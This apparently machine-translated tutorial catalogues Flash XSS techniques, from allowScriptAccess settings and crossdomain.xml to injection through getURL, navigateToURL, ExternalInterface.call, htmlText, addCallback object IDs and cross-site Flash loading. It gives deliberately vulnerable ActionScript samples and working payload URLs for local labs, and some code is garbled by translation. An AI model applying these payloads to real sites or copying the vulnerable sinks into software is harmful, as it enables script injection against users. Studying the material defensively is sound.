Summary of Common Flash XSS attack methods "worth collecting"

embed flash in 0x01 HTML

Embedded in the HTML in the flash in IE and non-IE browser embedded in different ways, you can use the Embed tag and object tags, using the following code to embed:

IE embedded under

<object codebase= "http://fpdownload.macromedia.com/get/Flashplayer/current/swFlash.cab#version=8,0,0,0" Classid= "clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" > <param name= "movie" value = "http://xxxx.sinaapp.com/ trace.swf "/> <param name=" allowscriptaccess "value=" Always "/> <param name=" allownetworking "value=" All " > </object>

Non IE embedded

<object type= "Application/x-shockwave-flash" Data= "/trace.swf" > <param name= "movie" value = "./trace.swf"/ > <param name= "allowscriptaccess" value= "Always"/> <param name= "allownetworking" value= "All"/> </ Object>

In the process of inserting flash, there are two important parameters, allowScriptAccess and allownetworking two parameters:

allowScriptAccess: Controls the communication between the HTML page and the Flash page.  Always:html and Flash page communication does not make any restrictions, samedomain:html and flash when the same domain can do communication "This value is the default value"; never:html and flash prohibit communication. Allownetworking: Control the Flash and external network communication. All:flash all network API communication interfaces are available; Internal:navigatetourl,fscommand,externalinterface.call unavailable; none: All network APIs are unavailable.

Take the Chrome browser as an example to verify the above parameters, first in the local environment, and a new Flash file, Flash file includes the content is mainly using Externalinterface.call Executive force a JS statement, pop-up domain domain name.

1): Insert the local flash file.

<object type= "Application/x-shockwave-flash" Data= "/trace.swf" > <param name= "movie" value = "./trace.swf"/ > <param name= "allowscriptaccess" value= "Always"/> <param name= "allownetworking" value= "All"/> </ Object>

Run Result:

2): Insert local flash, change the allowscriptaccess parameter to Samedomain.

<object type= "Application/x-shockwave-flash" Data= "/trace.swf" > <param name= "movie" value = "./trace.swf"/ > <param name= "allowscriptaccess" value= "Samedomain"/> <param name= "allownetworking" value= "All"/>

Run Result:

The HTML interface and Flash belong to the same domain and therefore can be ejected.

3): Insert local flash, change allowscriptaccess to never.

<object type= "Application/x-shockwave-flash" Data= "/trace.swf" > <param name= "movie" value = "./trace.swf"/ > <param name= "allowscriptaccess" value= "Never"/> <param name= "allownetworking" value= "All"/> </ Object>

The run result is not ejected.

4): Insert remote Flash, change allowscriptaccess to always.

<object type= "Application/x-shockwave-flash" Data= "http://xxxxx.sinaapp.com/trace.swf" > <param name= " Movie "value =" http://xxxx.sinaapp.com/trace.swf "/> <param name=" allowscriptaccess "value=" Always "/> < param name= "allownetworking" value= "All"/> </object>

Run Result:

Note that the domain that pops up here is the current HTML domain name, not the flash domain.

5): Insert remote Flash, change allowscriptaccess to Samedomain

<object type= "Application/x-shockwave-flash" Data= "http://xxxxx.sinaapp.com/trace.swf" > <param name= " Movie "value =" http://xxxx.sinaapp.com/trace.swf "/> <param name=" allowscriptaccess "value=" Samedomain "/> <param name= "allownetworking" value= "All"/> </object>

The run result does not pop up because the fields of flash are not in the same domain as the HTML.

6): Insert remote Flash, change allowscriptaccess to Never

<object type= "Application/x-shockwave-flash" Data= "http://xxxxx.sinaapp.com/trace.swf" > <param name= " Movie "value =" http://xxxxx.sinaapp.com/trace.swf "/> <param name=" allowscriptaccess "value=" Never "/> < param name= "allownetworking" value= "All"/> </object>

The run results did not pop up because the HTML interface was blocked from communicating.

7) will be allowscriptaccess to always, allownetworking to be placed as internal

<object type= "Application/x-shockwave-flash" Data= "http://xxxxx.sinaapp.com/trace.swf" > <param name= " Movie "value =" http://xxxxx.sinaapp.com/trace.swf "/> <param name=" allowscriptaccess "value=" Always "/> < param name= "allownetworking" value= "internal"/>

The running result is not ejected, the allownetworking parameter is internal and the interface Externalinterface.all is forbidden.

0x02 Flash cross-domain requests

Flash Cross-domain access is primarily affected by crossdomain.xml files. The Crossdomain.xml file strictly follows the XML syntax, and the main role is to allow requests when it is requested by Flash to this domain resource. For example: Www.evil.com A resource under Flash,flash cross-domain request www.q.com, the Crossdomain.xml file in the Www.q.com directory is viewed first to see if evil.com domain Flash is allowed to request resources for this domain. The Crossdomain.xml file consists mainly of the following nodes:

Site-control,allow-access-from,allow-access-from-identity, Allow-http-request-headers-from

commonly used nodes are Allow-access-from "may I see less = =", which indicates which domain resources are allowed to allow flash Cross-domain requests from this domain.

For example, the following are Youku's crossdomain.xml files:

<cross-domain-policy> <allow-access-from domain= "*.youku.com" />//allows flash access to youku.com domain name <allow-access-from domain= "*.ykimg.com"/> <allow-access-from "*. Tudou.com "/> <allow-access-from domain= *.tudouui.com"/> <allow-access-from domain= "*.tdimg.com"/> </cross-domain-policy>

Ps. This file is often used in Flash csrf, and when Allow-access-from domain is set to *, there may be a risk of flash csrf.

0x03 Common Flash XSS Classification summary

Flash flaw parameters-geturl

Flash provides related functions that can execute JS code, GetURL "AS2 support", Navigatetourl "AS3 support", Externalinterface.call. A related instance was searched in Wooyun:

Wooyun: Long-time Network flash security Problem Analysis and Utilization (i)

in accordance with the principles of learning to build local practice under: Local created a new Flash,flash call external resource XML file. Flash Code:

var root_xml:xml = new XML (); root_xml.ignorewhite = true; root_xml.onload = function (success) {&NBSP;&NB sp;   if (success) {         GetURL (root_xml.childnodes[0). Childnodes[0].childnodes[0].nodevalue)     }else{          GetURL ("Javascript:alert (' Fail ')")     }} root_xml.load (_root.url);

XML file:

<?xml version= "1.0" encoding= "Utf-8"?> <data>     <link >javascript:alert (' XSS ') </link> </data>

Run Result:

Ps. This type of problem can generally be used to search the XML file by the SWF invocation of the situation, the incoming content if not done filtering, it is very likely that such problems occur.

Flash defect parameter-navigatetourl

In the example above, Geturl () is the method in AS2, and the AS3 is used in Navigatetourl,wooyun instances where this parameter has been escalated to cause flash XSS.

wooyun-2012-016512 ">wooyun: [Tencent Example Tutorials]" We studied XSS-14 together in those years. Getting Started with Flash XSS [Navigatetourl]

This kind of problem is generally due to the invocation of resource files (such as XML) can be controlled by attackers, resulting in flash XSS.

The principle of learning, local build practice under: Flash File:

var url:string = stage.loaderInfo.parameters.url var req:urlrequest = new URLRequest ("A.xml"); var ld:urlloader = new Urlloader (); Ld.addeventlistener (Event.complete, OK);             function ok (evtobj:event): void {if (ld.data) {Navigatetourl (new URLRequest (URL), ' _self ')} else { }} ld.load (req)

The general meaning is to obtain a parameter from the outside, called by Navigatetourl.

Run Result:

Flash defect parameter-externalinterface.call (parameter i)

Externalinterface.call is also a flash provides the interface function that can execute JS, Externalinterface.call function has two parameters, form like Externalinterface.call ("function name", " Parameter 1 ").

Flash finally execute the JS code as follows:

try {__flash__toxml (function name ("Parameter 1");} catch (E) {"<undefined/>";}

This section first considers parameter 1, which is the function name.

The relevant examples on Wooyun are:

Wooyun: [Tencent Example Tutorial] we studied XSS-15 together in those years. Flash XSS Advanced [externalinterface.call first parameter]

Wooyun:flash Application Security Series [1]--360 reflective cross-station

These two articles are written in great detail.

The principle of learning, local build practice under: Flash File:

var a:string = Root.loaderInfo.parameters.func if (externalinterface.available) {Externalinterface.call (a)} else { Trace (M)} stop ()

Gets the parameter func from the outside, uses Externalinterface.call to receive the first parameter, executes.

Contrast:

try {__flash__toxml (function name ("Parameter 1");} catch (E) {"<undefined/>";}

To create a URL:

Http://192.168.4.70/ExternalInterface_first.swf?func=alert (1))}catch (e) {alert (100)}//

This actually executes the JS code is:

try {__flash__toxml (alert (1))}catch (e) {alert (100)}//("Parameter 1"));  catch (E) {"<undefined/>";} Http://192.168.4.70/ExternalInterface_first.swf?func=a1lert (1))}catch (e) {alert (m)}//try {__flash__toxml ( A1lert (1))}catch (e) {alert (100)}//("Parameter 1")); catch (E) {"<undefined/>";}

The expected result should be the first URL after the execution of the number 1, the second URL after the execution of the number 100 pop-up. Access

Http://192.168.4.70/ExternalInterface_first.swf?func=alert (1))}catch (e) {alert (100)}//

Access

Http://192.168.4.70/ExternalInterface_first.swf?func=a1lert (1))}catch (e) {alert (100)}//

Like the expected result.

Flash defect parameter-externalinterface.call (parameter two)

Sometimes when you decompile a SWF, you find that the output position of the controllable parameter is in the second parameter of the Externalinterface.call function, and the method and mentality are similar to the first parameter.

Wooyun inside the relevant example:

Wooyun: [Tencent Example Tutorial] we studied XSS-16 together in those years. Flash XSS Advanced [externalinterface.call second parameter]

Wooyun:flash Application Security Series [3]--wordpress Reflective cross-station (0day)

Flash File:

var a:string = Root.loaderInfo.parameters.par if (externalinterface.available) {externalinterface.call ("alert", a)} El Se {trace (m)} stop ()

A in the Flash file is a parameter obtained from the outside, where the parameter par is given to a, which is output to the position of the second parameter of the Externalinterface, which differs from the first parameter where the output point is in quotation marks. So here we need to close the quotes. According to the above two articles, you can find that the closed quotation marks use the method is/"This will be escaped to/", was eaten.

Based on the Externalinterface.call call prototype:

try {__flash__toxml (function name ("Parameter 1");} catch (E) {"<undefined/>";}

We enter the following URL for the parameter:

Http://192.168.4.70/ExternalInterface_second.swf?par=1111/%22), AL)}catch (e) {alert (1000)}//

The analysis should be performed as follows:

try{__flash__toxml (Alert ("1111//"), Al} catch (E) {alert (1000)}

That way it should pop up two boxes, one for 1111/and one for 1000. Run result, eject 1111/:

Click OK, eject 1000:

Ps. Here Externalinterface.call called the function name, write flash when the alert is set, so it will play two times, in general, the function name is not able to be controlled, so we make, the previous function execution exception, execute the catch in the JS can.

Flash defect parameter-htmltext

Flash supports embedded HTML in Flash, supports tag img tags, a tag, and so on. The IMG tag can introduce a flash file through the src parameter, similar to the XSF.

Wooyun:flash Application Safety Series [6]--Sina Weibo worm threat

The document is written in great detail and is recommended for reading. The principle of learning, the local creation of Flash files,

Import Fl.controls.TextArea; var a:string = root.loaderInfo.parameters.url var t:textarea = new TextArea () T.width = + T.height = T.htmltext = A AddChild (t)

From getting the parameter URL in the URL, assigning a value to a, the variable A is output directly to textarea T. Access to the following URL:

Http://192.168.4.70/htmltext.swf?url=%3Cimg%20src=%27./trace.swf%27%3E

The results of the visit are as follows:



Ps. When you decompile the Flash file and find the HTMLText output point, you can see if there is a related controllable input and there may be XSS. The Flash flaw Parameter object ID can be controlled when HTML communicates with SWF, using the Externalinterface.addcallback function, which is invoked as follows:

function A () {Trace ("Hi");} Externalinterface.addcallback ("Test", a);

After the function has been executed, the function A in flash can be invoked on HTML by using the name test of functions.

The principle of Addcallback:

if (((ActiveX = = True)) && (!) ( (ObjectID = = null))))   {_evaljs ((("__flash__addcallback (document.getElementById () + ObjectID) +"/"),/" ") + functionname) +"/"); };

Objectid is the id,functionname of the Flash for the function name, so when the ID of the flash we inserted is controllable, there may be an XSS problem.

Similar problems that have arisen on the Wooyun:

Wooyun: [Tencent Example Tutorial] we studied XSS-21 together in those years. Storage XSS advanced [guessing rules, using flash addcallback to construct XSS]

Wooyun:flash Application Security Series
[4]--flash player's another 0day

WOOYUN:QQ space A functional defect causes the log storage type XSS-12

The principle of learning, the local creation of Flash files,

function A () {Trace ("Hi")} externalinterface.addcallback ("Test", a)

X.html page

<object id= "addcallback,&quot;" (function () {if (!window.x) {Window.x=1;alert (1)}}) () (&quot; codebase= "http://fpdownload.macromedia.com/get/Flashplayer/current/swFlash.cab#version=8,0,0,0" classid= "clsid:d 27cdb6e-ae6d-11cf-96b8-444553540000 "> <param name=" movie "value ="/addcallback.swf "/> <param" allowScriptAccess "value=" Always "/> <param name=" allownetworking "value=" All "/> </object>

Access the interface (Test IE8):



Flash defect parameter Addcallback and LSO combination

The point at which the problem arises is the function declared in the Addcallback, which is controllable by the return value of the HTML interface JS execution, resulting in an XSS problem. Use LSO to First setlso, write dirty data, and then getlso get dirty data.


Drops the relevant information:

A large and stealthy theft of Taobao/Alipay account and password vulnerabilities-(with a video demo of the mine attack)

The principle of learning, the local creation of Flash files,

function Setlso (_arg1:string): boolean{var _local2:sharedobject = sharedobject.getlocal ("kj");     _local2.data.key = _ARG1;     _local2.flush (); return (true);     function Getlso (): string{var _local1:sharedobject = sharedobject.getlocal ("kj");     if (_local1.data.key = = undefined) {return (""); return (_local1.data.key); } externalinterface.addcallback ("Getlso", Getlso) externalinterface.addcallback ("Setlso", Setlso)

X.html


Run Result:



Cross-Station Flash

Cross-station Flash is the XSF, which loads third party flash files through as, and if this third party flash can be controlled, the XSF can be implemented. Load third party flash in AS2 using the Loadmove function, and so on.

_root.loadmovie (SWF);

Use the loader class for external data processing in AS3:

var param:object = root.loaderInfo.parameters; var swf:string = param["swf"]; var myloader:loader = new Loader (); var url:urlrequest = new URLRequest (SWF); Myloader.load (URL); AddChild (Myloader);

Local build environment, new flash:

var param:object = root.loaderInfo.parameters; var swf:string = param["swf"]; var myloader:loader = new Loader (); var url:urlrequest = new URLRequest (SWF); Myloader.load (URL); AddChild (Myloader);

New Local HTML file:

<object id= "LSO" type= "Application/x-shockwave-flash" Data= "http://192.168.4.70/xsf.swf" > <param "name=" Movie "value =" http://192.168.4.70/xsf.swf "/> <param name=" allowscriptaccess "value=" Always "/> <param Name= "allownetworking" value= "All"/> <param name= "flashvars" value= "swf=http://xxxxx.sinaapp.com/trace.swf" </object>

Running results, loading the remote defective SWF file resulted in the XSF.



Other